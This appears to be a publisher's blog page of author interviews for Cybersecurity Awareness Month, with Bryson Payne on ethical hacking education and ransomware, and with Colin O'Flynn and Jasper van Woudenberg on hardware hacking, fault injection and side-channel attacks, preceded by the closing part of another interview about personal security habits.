JD: Yes, due to my work I have a very different, limited online life. For example, outside of work-related social media, I have no personal accounts. And even with my limited social-media presence, I do not ever connect with family members – only work colleagues. I've used social media to map out relationships with adversary accounts, and know that someone could do the same to me. For that reason, I don’t use social media and, unfortunately for them, at least for now, my kids don't either. It’s not that I'm over-protective, but I don’t want them targeted by an attacker in an effort to get to me. And, to be honest, I think it's healthier at this point in life to let them just be kids. They will have an entire lifetime to be engulfed in social media, but for now I want them to just be kids.

As for my personal habits online, I use three different identity monitor and protection companies to keep an eye on my accounts. I never use the same password twice, nor do I use real “dictionary words” – and I always use two-factor authentication in addition to a hard-key (Yubi-key). I am religious about updating my passwords frequently, and you will never find a device in my home with a camera that is not covered. I also do not use traditional cloud-based services from vendors like Apple and Google.

To be honest, I live a pretty paranoid life because of the work I do and the fact that I put my name out there. At the same time, I think I need to be a bit paranoid, because if there is anything my job has taught me it is that anyone and anything can be hacked and compromised.


Cyber Defender Bryson Payne Takes Us to School


We continue the Cybersecurity Awareness Month edition of our ongoing Author Spotlight series with Bryson Payne, PhD – author of Go H*ck Yourself: An Ethical Approach to Cyber Attacks and Defense (January 2022). In the following Q&A, we talk with him about training the next generation of cyber defenders, why there's never been a better time to get a job in infosec, the security benefits of thinking like an adversary, and whether ransomware could soon be coming for your car. (Spoiler alert: it's already here!)

Go Hck Yourself Cover bryson Payne

Dr. Payne (@brysonpayne) holds the elite CISSP, GREM, GPEN, and CEH certifications, and is an award-winning cyber coach, author, TEDx speaker, and founding director of the Center for Cyber Operations Education at the University of North Georgia (an NSA-DHS Center for Academic Excellence in Cyber Defense). He's also a tenured professor of computer science at UNG, teaching aspiring coders and cyber professionals since 1998 – including coaching UNG’s champion NSA Codebreaker Challenge cyber ops team. His previous No Starch Press titles include the bestsellers Learn Java the Easy Way (2017) and Teach Your Kids to Code (2015).


No Starch Press: Cybersecurity Awareness Month is a great time to talk with you, because your career's been dedicated to making people aware of common and emerging security vulnerabilities. Recently though, high-profile hacks have hit the headlines like never before, with attacks on public utilities, government agencies, and customer databases causing real alarm among the general public. Are we starting to see a shift in the way mainstream society thinks about cybersecurity? If so, how can this be harnessed to make infosec stronger across the board?

Bryson Payne: All of us are seeing cyberattacks and breaches in the news, in the companies we do business with, and even in our own families. It’s a scary time to be so dependent upon technology, but there’s a bright side, yes –regular people are becoming smarter about how they use their devices, how they secure their information, and what information they share.

By understanding the threats that are out there, and how cybercriminals and cyberterrorists perform simple to complex attacks, you and I can protect ourselves and our families from cybercrime (or worse). And by training a new generation of cyber defenders, we can better protect our nation and our economy from future cyber threats.

NSP: You’re the founding director of the Center for Cyber Operations Education at UNG, where you’re also a tenured professor of computer science. So perhaps it’s no surprise that in 2018 UNG began offering a bachelor’s degree in cybersecurity – one of the nation’s first. Considering there are already a number of academic pathways that can lead to successful careers in the infosec world, what’s the benefit of pursuing such a specific major?

BP: The hands-on experience our students gain from real-world ethical hacking, forensics, network security, and reverse engineering in the classroom, in competitions, or in industry certifications, is more like what they’ll see in industry, government, and military cyber roles than traditional computer science or IT programs. In fact, the NSA and Department of Homeland Security are certifying more National Centers of Academic Excellence in Cyber Defense, like UNG, each year in order to give students the real-world skills needed to fight cybercrime, cyber terrorism, and even cyberwarfare for the next generation.

NSP: Does the addition of this degree program reflect a growing demand for cybersecurity pros in the workforce? And, for anyone reading this who’s considering going into the field (or going back to school to get credentialed), what are some of the career options you encourage students to explore?

BP: According to cyberseek.org, there are over 400,000 positions in cybersecurity open right now in the U.S. alone, with tens of thousands of new postings appearing every month. If you’re considering going into cyber, there’s never been a better time to get a certification, take a course, or study on your own.

If you like police dramas or mysteries, forensics could be a good fit. If you like taking things apart and (sometimes) putting them back together, reverse engineering or ethical hacking might be fun for you. If you like making sure everything works like it’s supposed to, you might make a great network operations or security operations center analyst. There’s a job for everyone, from trainers to managers to technicians – and the pay is growing faster than for many positions in non-security fields.

NSP: Studies have shown that at least half of college-age adults don’t pursue tech-related careers because they believe the subjects are too difficult to learn. What do you say to people who are interested in cybersecurity but don’t think they have what it takes?

BP: There are so many paths into cyber, whether you start out in psychology, journalism, international affairs, criminal justice, business, math, science, engineering, even health sciences. Cyber is a team sport, and we need people who understand not just the technology, but the people, processes, and even the cultures and languages involved in cybercrime, cyberattacks, and cyberwarfare. Every organization, from Fortune 500 companies to city governments, schools, and healthcare institutions, needs people like you and me thinking about cybersecurity and how to protect employees or customers.

But, while it's important to know that not every cyber job is a technical role, the more comfortable you are with the technology, the farther you can go.

NSP: Your upcoming book, Go H*ck Yourself, teaches readers how to perform just about every major type of attack, from stealing and cracking passwords, to launch phishing attacks, using social engineering tactics, and infecting devices with malware. Some critics might find it ironic that a champion of cyber defense would write a book that literally teaches people how to execute malicious hacks. Explain yourself!

BP: Just like in a martial arts class, you have to learn to kick and punch while you’re learning to block kicks and punches – you have to understand the offense to be able to defend yourself. By thinking like an adversary, you’ll see new ways to protect yourself, your company, your family, and the devices and systems you rely on in your daily life.

For too long we’ve been told what to do, but not why we need to do it. A great example is the password cracking you mentioned. When a reader sees how quickly and easily they can crack a one- or two-word password, even with numbers and symbols added to it, they finally have the mental tools to understand why we’re advocating for passphrases of four or five words. It’s the same with all the other attacks – once you see what a hacker can do, you understand how important good cyber hygiene is, and how small steps to secure your devices can really pay off.

NSP: One type of attack that's really skyrocketed lately is ransomware. Your home state of Georgia is just one example – city and county governments, state agencies, hospital systems, even local election systems have fallen victim to ransom demands. With hackers hammering away at our institutional weak spots, something as simple as not installing a security patch right away, or clicking on a link in a socially engineered email can usher in a potentially devastating attack. What do you think can be done to prevent the human errors arguably fueling the current ransomware rage?

BP: Ransomware is definitely one of the most serious threats to your business, your family, and your own financial security. But the good news is that you can keep yourself from being an easy target. While the news often refers to humans as the weakest link, I actually see us as the best first line of defense. Employees and leaders who can spot phishing emails, who install updates and patches regularly, and who use good cyber hygiene can block more than 99% of known attacks before they get into your organization! And smart security-minded computer users can also apply these practices at home to protect themselves and their loved ones from online adversaries on the prowl for easy vulnerabilities.

NSP: Along those same lines, a lot of organizations have started backing up their files as a failsafe. But hackers being hackers, they’ve already adapted: double-extortion ransomware is now the norm, where the data’s exfiltrated before it’s encrypted so it can be released online if the ransom is not paid. How bad is the problem, and what's the solution?

BP: Double-extortion malware can have the most devastating financial impact short of cyber-physical attacks (and by that I mean when malware takes over a manufacturing facility, critical infrastructure, or medical facility and causes real-world, physical damage to real equipment or even endangers human life). It's true that backups used to be enough to recover from ransomware without paying the ransom, but these double-extortion attacks can steal data for months before locking down systems and demanding payment.

The best defense, in addition to those backups, is having well-trained cyber professionals doing what we call "active threat hunting" – looking for suspicious activity, like small file transfers overnight or to unknown networks, and tracking down systems that show indicators of attack or compromise. That’s why it’s important that we train more cyber defenders. Every organization needs cyber heroes now, so it's the perfect time to develop these skills.

NSP: Dr. Payne, you have arrived at your final destination. (Well, my last question anyway.) Over the past decade you’ve done some very cool conference presentations on car hacking, and have since turned them into a tutorial on your blog. The cool factor aside, this is an increasingly relevant skill set for aspiring white hats – since 2016 there’s been a 94% year-over-year increase in automotive cybersecurity incidents, including remote attacks that can control your steering, pump your brakes, shut down the engine, unlock your doors, open the trunk, etc.

1) Is it only a matter of time before ransomware infects this realm of life, with people, say, unable to start their car until they pay a hacker? 2) In the future, should automakers be pentesting cars at the level they perform crash tests? 3) Does this keep you up at night, or are you optimistic that your UNG graduates will have a solution?

BP: It is only a matter of time before we see ransomware and similar attacks regularly affecting smart cars. Today’s automobiles can have more than 40 computer chips, dozens of systems, and networks and connections from USB to 5G, Wi-Fi, Bluetooth, GPS, satellite radio, and more. We call that the “attack surface” of a system, and with so many ways for hackers to try to get into your vehicle, we’ve actually already seen successful remote attacks in the wild – and we’ll continue to see new ones. The good news is that every make and model is slightly different, so a hack that works on a Honda might not work on a Ford, and vice versa.

That being said, auto manufacturers have a responsibility to secure the networks and computer systems inside your vehicle and mine from malicious hackers, which is why I happen to believe that teaching young people how to test and secure these systems – starting within a virtual environment like we do in the book – is one of the best ways to protect our vehicles and our personal safety from ransomware on the roadway.

Break It Till You Make It: Q&A with Hardware Hackers Colin O'Flynn and Jasper van Woudenberg


To kick off the Cybersecurity Awareness Month edition of our ongoing Author Spotlight series, we're joined by Colin O’Flynn and Jasper van Woudenberg, co-authors of The Hardware Hacking Handbook (available November, 2021). In the following Q&A, we talk with Colin (@colinoflynn) and Jasper (@jzvw) about the perils of proprietary protocols being replaced with network devices, the problem of having too many interesting targets to test your tools on, the beauty of AI-designed attack systems, the indisputable power of “hammock hacking,” and why nobody cares about fault injection until they get hacked with fault injection.

Hardware Hacking Handbook Cover Colin Oflynn Jasper VanWoudenberg

Colin runs NewAE Technology, Inc., a startup based on his ChipWhisperer project that designs tools to make hardware attacks more accessible, and teaches engineers about embedded security – a topic he frequently speaks about at conferences and on tech podcasts.

Jasper is CTO of Riscure North America, where he leads the company’s pentesting teams, and has a special interest in integrating AI with security. His research has been published in various academic journals, and he’s a regular speaker at educational and hacking conferences.

No Starch Press: I’ll start by saying that your book is timely! Hardware hacking, once a niche field of the exploit world, has become far more relevant amidst the proliferation of embedded devices all around us. What do you think accounts for this, and why are side-channel attacks in particular becoming increasingly common (and difficult to prevent)?

Colin O'Flynn: Hardware hacking has been a niche field, but one with an extensive and long history. Most of the powerful attacks we’re discussing today have been demonstrated for 20 years, so I’d say they should be “well-known.” But the truth seems to be that, until recently, advanced hardware attacks weren’t needed for most IoT devices. Default passwords and unlocked debug interfaces were the norm, so most hardware hackers never needed to dig deeper. Many people I’ve talked to at events have told me they were interested in side-channel and similar advanced attacks but never had time to actually learn them, as they were always able to break devices with easier and faster attacks!

The good news is that device manufacturers seem to be taking security more seriously these days, which means side-channel attacks have become a real threat. So I guess we’re seeing the industry fast-forwarding that 20-year lag of security research to catch up.

Jasper van Woudenberg: Hacking always moves with interesting targets. Once pinball machines started requiring money to play, people “hacked” them by just tilting the whole machine. Nowadays physical pinball machines have a tilt sensor – if you tilt the machine in order to affect the ball, it ceases operation. Of course, we’re talking about digital hardware in our book, but bypassing security systems is as old as security systems. So, the abundance of digital devices naturally increases the amount of hacking going on. Side-channel attacks are fascinating if you’re into the intersection between electronics, signal processing and cryptography. Beyond being fascinating though, they only become relevant when more straightforward attacks are mitigated.

NSP: Fault injection (FI) attacks – which inject a glitch into a target device that alters its behavior so you can bypass security mechanisms – used to be too “high end” for most hackers to bother with, often requiring expensive tools and intimate technical knowledge of the specific system under attack. But those days are over. Not only are low-cost FI toolkits readily available, the explosion of IoT has led to the rise of new defensive features, like Secure Boot, that can be easily subverted by a well-timed FI attack. What are the potential risks to a larger IoT network once a device is compromised this way?

CO: In the past we’ve seen end devices used as a pivot point into a more sensitive network. When it comes to commercial devices, we’re seeing many proprietary protocols replaced with network devices. For example, recent access-control readers are now simply PoE devices that talk back to a central server. With many of these devices, the original designers haven’t considered what happens if an end node becomes compromised. While the network may be correctly secured, you still see sensitive credentials stored in end devices become accessible to an attacker. And if an attacker is able to access these credentials, it means they may be able to pivot off the external network and into more sensitive internal networks.

JVW: I think the cost of the tools is a common misunderstanding – they can be really inexpensive. In our lab, we’ve done attacks literally by soldering a single wire to a bus, connecting it to a button, and when we pressed the button at the right time, the system boots our own code. The cost usually comes from the many days and weeks spent trying to figure out how to carry out the attack. And yes, some attacks do require high-end equipment, or at least equipment that can bring down the time used to figure out the attack.

One common stepping-stone attack we see is the firmware dump. Typically, embedded-device firmware does not receive a lot of scrutiny, and may have lingering vulnerabilities that can be exploited. This usually means gaining control over a single device, but there have been wormable firmware issues in the past.

NSP: What measures can be taken to harden embedded systems against FI attacks, and do you see this happening throughout the industry (why or why not)?

JVW: We always advise our customers to threat model and see if it makes sense to consider FI in scope. Usually that’s the case for embedded systems that are out in the field and have some sensitive assets to protect. Next is the question of whether faults can be mitigated in hardware and/or software. Both is ideal, but that’s not always feasible. Our book contains a chapter on countermeasures that also has a lab, so people can try out some ideas for FI countermeasures. Finally, verification of countermeasures early and often is critical. It’s virtually impossible, as a human, to predict all the ways a system can fault. Pre-silicon fault simulation and post-silicon fault injection, without exception, turn up surprises. Iteration and adaptation are key.

And then the million-dollar question: why is the hardening not happening throughout the industry? It’s a combination of cost and human nature. There is a real engineering cost to these countermeasures, so typically we only see customers that have had their devices compromised requiring FI resistance. If a compromise hasn’t happened, it’s very easy to write the attacks off as unrealistic or irrelevant. Nobody cares about fault injection until they get hacked with fault injection.

CO: Fault injection can be tricky to prevent, as we see countermeasures applied that aren’t effective. For instance, Jasper and I demonstrate a few examples in the book where compilers might remove the effect of your clever countermeasures. There seems to be a lot more interest in this now – for many companies, they just need some “end customer” to ask about it. I talked to silicon vendors a few years ago who were tracking countermeasure ideas, but basically none of their customers (people who actually build products) cared about FI attacks. So that meant they weren’t going to pay for engineering efforts to add those countermeasures. We seem to be seeing a very fast shift in the last couple of years though, so people who were tracking this early-on are in a good position to quickly offer solutions.

NSP: Speaking of low-cost fault-injection toolkits, Colin, you developed one of the most popular models out there, the ChipWhisperer, and built a company around it (NewAE Technology). Given that just about everything we use in our homes and offices has embedded computing systems and could be vulnerable to attack, how do you pick which devices to test your boards and analysis algorithms on? An example from your book would be smart toothbrushes – are you ever doing something like brushing your teeth when it suddenly occurs to you, “Wow, I could totally hack this thing”?

CO: This is actually a big problem! Unfortunately I tend to buy a lot of devices (microcontrollers, IoT products, industrial control systems, etc.) because I think they will be interesting to poke at! As a result, I’ve got a storage cabinet full of various devices along these lines… I’m slowly working through some of them, and when we get some time at the company, we’ll pick away at one or two of those devices as well.

But as more devices include embedded security, there are more “interesting" targets than there is hope of having time to deal with them. Part of why we design many different target-board devices (our “UFO targets” for ChipWhisperer) is actually to help out other researchers by giving them an easier platform to work with.

NSP: Once you successfully exploit a commonly used product, do you let the manufacturer know or is that generally considered an exercise in futility?

CO: If I plan on talking about the issue publicly I’ll reach out, even if I don’t think it’s a serious issue. Sometimes it takes a bit of time to reach the correct person (or team), but so far they have all generally spun it into positive experiences all around.

With one ongoing disclosure, for example, the engineering team had internally flagged that there could be some issues related to a relatively unsecure microcontroller that they were using in a product, and my report had validated their internal concerns. In this case they were already working on a new design, but I’m sure my report was a nice bonus for the people involved, as they can point to that as proof that the issue would be found eventually “in the wild.” In the meantime it gave them the opportunity to provide an interim fix via a firmware update for existing customers.

NSP: Jasper, one of your specialized areas of interest is combining AI with security research. Would you explain what this entails? And looking into the future, how could AI applications be leveraged to improve hardware and embedded security at the design level?

JVW: What I love about AI is also what I love about hacking: making a computer device do more than the original designer put in. With AI, this is tying a couple of artificial neurons together and getting a cat-and-dog image detector. With hacking, this is sending some weird input into a program and all of a sudden it executes arbitrary code.

The combination, I find fascinating. For instance, we’ve used neural networks to do side-channel analysis and outperform human-designed algorithms. We created an algorithm with colleagues that automatically optimizes fault injection parameters. I’ll work very hard to create some automation so I can be – paradoxically – lazy afterwards.

I firmly believe that most if not all cognitive activities, such as designing or attacking systems, will be better performed using AI rather than brains – the big question is when. I prefer to be on the side of making systems more secure through AI, so my research is going towards automating both the detection and mitigation of vulnerabilities, at scale. For instance, a big push we have currently is in pre-silicon security – detecting side-channel and fault issues before they make it into products. I wouldn’t say we’ve arrived at using AI yet, but the first steps are being made.

NSP: Both of you have advanced degrees, which makes sense given all of the academic knowledge involved with embedded security. Yet, The Hardware Hacking Handbook makes very little assumption about a reader’s background. What was your approach to making this challenging field accessible to novices and newcomers, and why was it important enough that you wrote an entire book on this premise?

CO: My career path on paper seems relatively full of academic love – I was an assistant professor for several years in the Electrical & Computer Engineering department at Dalhousie University. But back at the start, when I was considering applying to start my undergraduate degree in electrical engineering, I came relatively close to not attending university at all. I had self-taught myself a fair amount about electronics in high school, and managed to get a summer job that was effectively an electrical engineering internship, and was considering just continuing to grow with the “on the job” experience instead. In the end I fell onto the academic path, but I’ve always believed that it is not the only path, and part of this shapes my desire to make this as accessible as possible.

While many readers may be undergraduate or grad students, it’s clear that a classic academic textbook would cut out readers coming from other backgrounds (including everyone from high school students to professionals interested in looking at other careers). Practically, what we write down isn’t the only consideration – one of the great things about working with No Starch Press is that the pricing of the books makes them more accessible as well. From academic publishers, this book would have been $150+. And there would never be Humble Bumble sales that make it completely accessible on the level that NSP does!

JVW: I’ve taught courses on side-channel and fault injection for years, and it has taught me that the group of people that has to defend against these attacks is not necessarily interested in all the theory and all the research in this field. They want to focus on their goals of creating a system.

Then there’s the group of people like teenage me. I started hacking software before I had an internet connection, so I know the struggle of having to figure out everything by yourself. Looking around at the amazing blogs, videos, tutorials, etc. that exist for the software space currently, it really made me realize what a gap there is in the hardware space.

So, for both these groups, it’s really about breaking things down into practical tips and tricks, and then some of the unavoidable theoretical background. I really would like to show people that this space isn’t daunting, and that even someone like me – who came off a software background – can learn and enjoy it.

NSP: I’ll end with an easy one (I think) – what is your favorite hacking tool, and has that changed since you first got interested in hardware hacking when you were young?

CO: I should probably say my favourite tool is one of my own more-advanced products. But really, a good DMM is the most important tool! And in that regard, it hasn’t changed much over the years – one of my first “dream gifts” (back when Santa would be responsible for it) was a Fluke 12 multimeter, long before I knew about hardware hacking. I’ve since upgraded to a nicer meter (Fluke 179/EDA2 kit), but as we talk about in the book, there is so much you can do with this tool! Finding where pins go, checking the state of logic levels and voltages – it’s still my most used tool when I’m looking at a new device.

JVW: I started being “creative with technology” in the mid-’90s. What has changed is the amount of information available, and the fact that security is now an actual career – I still don’t always believe people are willing to pay me to do this. What hasn’t changed is my curiosity, and the rush that comes with solving a complex problem.

Favorite hacking tool? Hah. Although I use devices for a significant portion of the day, they are also a source of frustration. So, those are out. I’m going to say: my hammock. When I get stuck on a problem and I sense no more new ideas are being produced, or I get frustrated, I drop the problem for a few hours or days. Then I hop in my hammock for what I call “hammock hacking.” This is where I hang back and relax. I’ll almost always have a new view on the problem, or another way of connecting some dots that I hadn’t considered before. Or I fall asleep. But it’s a win in either case.